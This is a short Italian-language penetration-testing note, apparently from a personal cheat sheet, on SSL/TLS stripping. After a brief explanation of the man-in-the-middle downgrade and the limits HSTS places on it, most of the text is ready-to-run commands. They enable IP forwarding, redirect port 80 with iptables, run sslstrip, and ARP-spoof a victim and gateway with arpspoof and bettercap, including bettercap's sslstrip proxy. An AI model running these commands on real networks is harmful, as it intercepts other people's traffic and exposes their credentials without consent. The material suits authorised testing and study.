tags: SSL-TLS_Stripping sniffing


In parole semplici, SSL/TLS Stripping è un attacco MitM che mira a forzare la connessione di una vittima a un sito web su HTTP (non criptato) anche se il sito normalmente supporta e preferisce HTTPS (criptato con TLS/SSL). Non è più molto efficace a causa dell’introduzione del protocollo HSTS che forza i browser a connettersi esclusivamente tramite https, ma può ancora tornare utilii in alcuni contesti, funziona solo nel primo momento della connessione, e solo su siti mal configurati o deboli (molti router, interfacce web interne, portali Wi-Fi captive, ecc.).

sslstrip

sudo apt install sslstrip
 
#Abilita il portforwarding
sudo sysctl -w net.ipv4.ip_forward=1
 
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
 
sudo sslstrip -l 8080
 
#Avvia arp-spoofing in parallelo
 
sudo arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1
sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105

Bettercap

sudo sysctl -w net.ipv4.ip_forward=1
 
sudo bettercap -iface wlan0
 
net.probe on
set arp.spoof.targets 192.168.1.105
set arp.spoof.fullduplex true
arp.spoof on
 
# Abilita il modulo HTTPS proxy
set https.proxy.sslstrip true
https.proxy on